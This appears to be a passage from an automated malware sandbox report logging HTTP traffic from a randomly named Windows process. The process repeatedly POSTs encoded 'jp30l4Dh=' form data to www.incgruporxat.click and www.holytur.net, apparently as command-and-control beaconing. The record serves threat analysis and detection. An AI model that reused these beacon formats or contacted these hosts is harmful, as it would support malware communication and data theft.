                                                              Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                                                              Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK
                                                              Nov 24, 2024 08:36:08.551362991 CET | 405 | IN | Data Raw: 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 aa 4c ea 5c e4 d5 42 67 b1 ad
                                                              Data Ascii: /1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>ylo:J8OP=gH4Orr


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              18 | 192.168.2.7 | 49990 | 104.21.88.139 | 80 | 520 | C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 24, 2024 08:36:09.960706949 CET | 760 | OUT | POST /ryxy/ HTTP/1.1
                                                              Host: www.incgruporxat.click
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.incgruporxat.click
                                                              Referer: http://www.incgruporxat.click/ryxy/
                                                              Content-Length: 241
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 30 6c 6e 57 31 64 71 49 4f 55 64 30 2b 55 44 36 78 6f 62 62 6a 73 71 45 32 6f 77 4b 4b 48 59 48 2f 66 47 71 69 45 39 4b 61 70 61 79 56 4c 2f 51 6c 4d 65 6a 69 42 52 65 70 6a 48 54 32 67 68 53 48 71 38 48 4f 5a 6e 57 56 31 42 6e 6b 76 68 68 57 47 53 59 45 59 45 4d 4e 39 34 43 48 77 5a 7a 36 58 52 6f 62 53 59 78 77 4a 77 48 38 51 77 6e 76 68 63 4d 5a 4c 51 5a 41 32 52 37 45 37 6a 34 34 38 71 47 67 2f 76 45 68 59 75 39 38 49 67 76 73 42 73 79 37 71 72 52 49 76 58 35 47 4b 58 72 63 6f 2f 63 30 32 4c 39 6a 64 5a 68 78 2b 49 6f 4f 49 50 66 6a 51 39 6d 2f 4e 64 62 5a 61 48 67 78 49 38 61 34 38 48 58 69 7a 33 52 41 53 2b 44 4f 78 38 36 77 77 34 79 77 44 6d 2b 47 78 6a 79 2b 6b 78 62 65 59 63 3d
                                                              Data Ascii: jp30l4Dh=0lnW1dqIOUd0+UD6xobbjsqE2owKKHYH/fGqiE9KapayVL/QlMejiBRepjHT2ghSHq8HOZnWV1BnkvhhWGSYEYEMN94CHwZz6XRobSYxwJwH8QwnvhcMZLQZA2R7E7j448qGg/vEhYu98IgvsBsy7qrRIvX5GKXrco/c02L9jdZhx+IoOIPfjQ9m/NdbZaHgxI8a48HXiz3RAS+DOx86ww4ywDm+Gxjy+kxbeYc=
                                                              Nov 24, 2024 08:36:11.250920057 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Sun, 24 Nov 2024 07:36:11 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              x-turbo-charged-by: LiteSpeed
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSkx2FhE7dBH3OWiky2Oayu7vTWLQCkaANK5jgKQtMQXwDRrYBfd62%2BDuwmeuCL%2FXmnAy5ZSB9nRVsTySOTU65dFlf8us3PXiDxtk0UO0Lxffo2rkXfS9cgK6z4Y41cU5TBMkC5FClxe"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e77b9fc2bb8c346-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1686&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                              Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                                                              Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/
                                                              Nov 24, 2024 08:36:11.250972986 CET | 396 | IN | Data Raw: 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 aa 4c ea 5c e4 d5 42 67 b1 ad 96 cf 9d a6
                                                              Data Ascii: 1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>ylo:J8OP=gH4OrrG


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              19 | 192.168.2.7 | 49991 | 104.21.88.139 | 80 | 520 | C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 24, 2024 08:36:12.617458105 CET | 1773 | OUT | POST /ryxy/ HTTP/1.1
                                                              Host: www.incgruporxat.click
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.incgruporxat.click
                                                              Referer: http://www.incgruporxat.click/ryxy/
                                                              Content-Length: 1253
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 30 6c 6e 57 31 64 71 49 4f 55 64 30 2b 55 44 36 78 6f 62 62 6a 73 71 45 32 6f 77 4b 4b 48 59 48 2f 66 47 71 69 45 39 4b 61 6f 4f 79 56 35 33 51 33 39 65 6a 34 42 52 65 33 7a 48 6f 32 67 67 4f 48 71 30 44 4f 5a 71 74 56 33 70 6e 31 39 35 68 42 6e 53 59 4b 6f 45 4d 50 39 34 44 61 41 5a 71 36 57 68 73 62 52 77 78 77 4a 77 48 38 53 59 6e 6f 77 63 4d 66 4c 51 61 48 32 52 33 56 72 6a 41 34 38 69 57 67 2b 62 2b 67 6f 4f 39 39 6f 77 76 75 55 77 79 6e 36 72 66 45 50 57 71 47 4b 54 30 63 72 4c 71 30 31 58 58 6a 63 74 68 79 34 64 4d 65 63 50 4c 34 58 42 34 67 4c 39 34 65 70 48 72 34 6f 6b 67 2b 66 37 5a 75 51 7a 74 49 77 53 56 50 55 78 49 67 67 78 44 37 7a 75 50 43 45 53 5a 72 48 6c 6d 61 59 67 77 4f 35 6c 36 43 6e 78 30 6f 76 69 30 39 4f 45 54 7a 6d 67 6c 2b 43 59 62 30 50 76 52 79 6d 79 32 34 4b 56 70 6c 77 32 39 39 77 75 4f 79 69 39 2b 6b 4e 44 50 34 6f 4e 64 39 61 43 51 55 62 4a 70 4d 78 6c 6c 57 35 64 71 71 6f 61 76 4e 4b 43 42 6d 31 59 48 59 43 6c 69 41 73 6e 2b 50 4a 41 5a 56 [TRUNCATED]
                                                              Data Ascii: jp30l4Dh= [TRUNCATED]
                                                              Nov 24, 2024 08:36:13.959289074 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Sun, 24 Nov 2024 07:36:13 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              x-turbo-charged-by: LiteSpeed
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r3nEfo0nDxmkXvQ2Yvt3miIdHOcV059kkDYAPKMg9Zzdyrfd9kMOtAvrxyDbMbsw2KICV1PHK3aTB52mM%2BT8Cjs%2FBuU6slLLVPRhJGX4T5eiWs7Nk92qPjhfran3%2Ftd%2FHnOwuupv5YKn"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e77ba0d1f850c88-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1689&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1773&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                              Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                                                              Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-E
                                                              Nov 24, 2024 08:36:13.959383965 CET | 401 | IN | Data Raw: 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 aa 4c ea 5c e4 d5 42 67 b1
                                                              Data Ascii: K/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>ylo:J8OP=gH4Orr


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              20 | 192.168.2.7 | 49992 | 104.21.88.139 | 80 | 520 | C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 24, 2024 08:36:15.282082081 CET | 465 | OUT | GET /ryxy/?jp30l4Dh=5nP22pW/HG819Fng1Mz7yNOWgr5NC2Ij4byTmEdiR9nhSI/SzfeElgFcrUzbpmknLrIGF7midHkQ4cZuPV+EIZllAsQAC3VF+SNvWHYn95kn9m51zzgbYIlZAQB9dsTK/N+poNP3vY+X&Yh8=pl0prhRpj HTTP/1.1
                                                              Host: www.incgruporxat.click
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Nov 24, 2024 08:36:16.535341978 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Sun, 24 Nov 2024 07:36:16 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              x-turbo-charged-by: LiteSpeed
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NkmBSC1s5%2F4%2BdFkxwi5lfTkFrbdrxc%2FbcAg%2F3z3zV%2BJHrQDuJueHbVWctYsazP9vJI0CGvWcj%2FaotNYYVUuVPg52zX4WvcklN2qmTDocteTIlpxneu3%2BZcJxqgaCOLhHmL1lfMbNRHyT"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e77ba1d3c417c8a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1937&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=465&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                              Data Raw: 34 65 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED]
                                                              Data Ascii: 4e2<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                                                              Nov 24, 2024 08:36:16.535377979 CET | 910 | IN | Data Raw: 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20
                                                              Data Ascii: height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; l


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              21 | 192.168.2.7 | 49993 | 185.106.208.3 | 80 | 520 | C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 24, 2024 08:36:22.399091005 CET | 719 | OUT | POST /oeev/ HTTP/1.1
                                                              Host: www.holytur.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.holytur.net
                                                              Referer: http://www.holytur.net/oeev/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 31 44 4c 64 38 61 71 70 6c 71 33 6f 66 73 71 64 47 79 56 43 6d 30 62 6e 6e 61 75 56 61 61 55 65 45 39 38 48 54 52 66 62 53 49 6e 6c 72 47 6c 6d 70 6a 48 46 35 63 6f 4e 46 4b 46 4b 45 74 75 36 72 50 33 2b 53 35 79 76 58 41 4a 68 4e 5a 32 31 73 2b 47 6d 6e 67 57 5a 44 4a 51 59 47 66 48 55 52 43 77 37 6b 67 57 73 70 4e 44 59 63 4d 72 64 47 6b 4b 70 57 2f 49 76 52 62 4f 65 47 33 6b 59 57 57 4d 41 71 44 59 35 5a 49 51 64 37 7a 43 72 4e 70 30 76 44 32 31 44 36 45 44 6a 4b 78 31 73 2f 69 4a 4e 6b 78 49 66 37 6f 73 47 31 43 4f 79 37 73 6b 68 38 69 4d 6f 42 39 36 65 37 52 7a 58 78 35 45 64 7a 62 7a 44 6a 30 75 56 42 49 4a 77 73 41 3d 3d
                                                              Data Ascii: jp30l4Dh=1DLd8aqplq3ofsqdGyVCm0bnnauVaaUeE98HTRfbSInlrGlmpjHF5coNFKFKEtu6rP3+S5yvXAJhNZ21s+GmngWZDJQYGfHURCw7kgWspNDYcMrdGkKpW/IvRbOeG3kYWWMAqDY5ZIQd7zCrNp0vD21D6EDjKx1s/iJNkxIf7osG1COy7skh8iMoB96e7RzXx5EdzbzDj0uVBIJwsA==
                                                              Nov 24, 2024 08:36:23.848117113 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:36:22 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
                                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              22 | 192.168.2.7 | 49994 | 185.106.208.3 | 80 | 520 | C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 24, 2024 08:36:25.075448036 CET | 739 | OUT | POST /oeev/ HTTP/1.1
                                                              Host: www.holytur.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.holytur.net
                                                              Referer: http://www.holytur.net/oeev/
                                                              Content-Length: 241
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 31 44 4c 64 38 61 71 70 6c 71 33 6f 5a 4f 2b 64 42 54 56 43 79 6b 62 34 69 61 75 56 44 4b 55 61 45 39 41 48 54 51 71 44 53 2b 33 6c 72 69 68 6d 6f 69 48 46 30 38 6f 4e 57 4b 46 50 61 64 75 78 72 50 37 41 53 38 53 76 58 41 4e 68 4e 59 47 31 73 4a 61 6c 6d 77 57 66 4f 70 51 4e 4c 2f 48 55 52 43 77 37 6b 67 43 4b 70 4e 37 59 64 38 37 64 47 47 6a 62 63 66 49 73 63 4c 4f 65 51 33 6b 55 57 57 4d 79 71 43 46 63 5a 4b 6f 64 37 79 53 72 4e 38 55 73 4b 32 31 46 30 6b 43 43 48 78 34 77 37 57 4e 6a 37 67 42 4c 2b 4a 6f 61 35 55 50 51 68 4f 6f 4e 69 7a 30 54 46 2f 65 6f 73 33 75 69 7a 34 41 46 2b 35 48 69 38 44 4c 2f 4d 61 6f 30 36 77 66 56 36 4f 54 4e 6a 52 61 4e 30 37 54 7a 6b 66 6f 6b 64 38 59 3d
                                                              Data Ascii: jp30l4Dh=1DLd8aqplq3oZO+dBTVCykb4iauVDKUaE9AHTQqDS+3lrihmoiHF08oNWKFPaduxrP7AS8SvXANhNYG1sJalmwWfOpQNL/HURCw7kgCKpN7Yd87dGGjbcfIscLOeQ3kUWWMyqCFcZKod7ySrN8UsK21F0kCCHx4w7WNj7gBL+Joa5UPQhOoNiz0TF/eos3uiz4AF+5Hi8DL/Mao06wfV6OTNjRaN07Tzkfokd8Y=
                                                              Nov 24, 2024 08:36:26.596673012 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:36:25 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
                                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              23 | 192.168.2.7 | 49995 | 185.106.208.3 | 80 | 520 | C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 24, 2024 08:36:27.740742922 CET | 1752 | OUT | POST /oeev/ HTTP/1.1
                                                              Host: www.holytur.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.holytur.net
                                                              Referer: http://www.holytur.net/oeev/
                                                              Content-Length: 1253
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
